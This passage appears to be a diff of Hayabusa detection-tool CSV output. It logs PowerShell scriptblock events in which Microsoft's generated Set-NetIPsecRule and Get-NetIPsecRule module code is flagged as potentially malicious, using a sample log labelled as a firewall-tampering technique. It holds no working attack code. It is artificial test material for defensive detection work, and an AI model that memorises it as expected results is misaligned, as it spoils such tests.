[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 